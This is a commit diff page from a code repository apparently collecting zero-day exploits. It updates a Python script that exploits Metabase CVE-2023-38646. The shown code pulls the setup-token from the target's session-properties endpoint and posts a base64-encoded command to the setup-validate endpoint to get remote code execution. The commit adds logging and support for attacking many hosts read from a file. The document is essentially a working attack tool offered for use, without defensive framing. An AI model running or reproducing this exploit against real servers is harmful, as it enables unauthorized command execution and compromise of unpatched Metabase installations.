admin/0day
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

update Metabase CVE-2023-38646 RCE add logging func

Browse Source
This commit is contained in:
helloexp 2023-07-30 23:18:14 +08:00
parent 40c0d772f6
commit b9f83c4750
1 changed files with 34 additions and 13 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

47
93-数据库专区/02-Metabase/CVE-2023-38646/cve-2023-38646.py
View File

@ -4,21 +4,35 @@
import argparse import argparse
import requests import requests
import base64 import base64
import logging
logging.basicConfig(level=logging.INFO,
format='[%(asctime)s.%(msecs)03d] [%(levelname)s] : %(message)s',
)
def check_host(host):
if host is None:
return False
if len(host) > 0:
return True
else:
return False
def exploit(host, port, cmd, protocol='http://'): def exploit(host, port, cmd, protocol='http://'):
global setup_token global setup_token
target =protocol+ host + ':' + port target = protocol + host + ':' + port
print(f'Attacking {target}') logging.info(f'[+] Attacking {target} ...')
url = target + '/api/session/properties' url = target + '/api/session/properties'
step_one = requests.get(url, verify=False) step_one = requests.get(url, verify=False)
result = step_one.json() result = step_one.json()
try: try:
setup_token = result['setup-token'] setup_token = result['setup-token']
except KeyError as e: except KeyError as e:
print("setup-token missed") logging.error("setup-token missed")
exit(0) exit(0)
print(f'[+] setup-token={setup_token}') logging.debug(f'[+] setup-token={setup_token}')
check_url = target + '/api/setup/validate' check_url = target + '/api/setup/validate'
response = requests.post(check_url, timeout=3, response = requests.post(check_url, timeout=3,
@ -44,16 +58,17 @@ def exploit(host, port, cmd, protocol='http://'):
}, },
} }
) )
print(f'[+] Server response:\n{response.text}') logging.debug(f'[+] Server response: {response.text}')
logging.info(f'[+] Server resp code: {response.status_code}')
if __name__ == '__main__': if __name__ == '__main__':
parser = argparse.ArgumentParser(description='exp for cve-2023-38346') parser = argparse.ArgumentParser(description='exp for cve-2023-38346')
parser.add_argument('--host', help='输入目标ip')
parser.add_argument('--file', help='输入包含目标的文件')
parser.add_argument('--port', default='3000', help='输入目标端口,默认为 3000')
parser.add_argument('--cmd', type=str, required=True, help='输入目标ip')
parser.add_argument('--protocol', type=str, default='http', help='输入目标协议http或https') parser.add_argument('--protocol', type=str, default='http', help='输入目标协议http或https')
parser.add_argument('--host', help='输入目标ip')
parser.add_argument('--port', default='3000', help='输入目标端口,默认为 3000')
parser.add_argument('--file', help='输入包含目标的文件')
parser.add_argument('--cmd', type=str, required=True, help='输入目标ip')
args = parser.parse_args() args = parser.parse_args()
protocol = args.protocol protocol = args.protocol
@ -74,6 +89,8 @@ if __name__ == '__main__':
with open(host_file, 'r') as f: with open(host_file, 'r') as f:
for temp_host in f: for temp_host in f:
temp_host = temp_host.rstrip('\n') temp_host = temp_host.rstrip('\n')
if '://' in temp_host:
protocol = temp_host.split('://')[0] + '://'
if ':' in temp_host: if ':' in temp_host:
host = temp_host.split(':')[0] host = temp_host.split(':')[0]
port = temp_host.split(':')[1] port = temp_host.split(':')[1]
@ -81,14 +98,18 @@ if __name__ == '__main__':
host = temp_host host = temp_host
port = '3000' port = '3000'
try: try:
exploit(host, port, b64_cmd, protocol) if check_host(host):
exploit(host, port, b64_cmd, protocol)
except Exception as e: except Exception as e:
print(f'Connection error:\n{e}') print(f'[-] Connection error:\n{e}')
continue
else: else:
host = args.host host = args.host
port = args.port port = args.port
try: try:
exploit(host, port, b64_cmd, protocol) if check_host(host):
exploit(host, port, b64_cmd, protocol)
except Exception as e: except Exception as e:
print(f'Connection error:\n{e}') logging.error(f'[-] Connection error:\n{e}')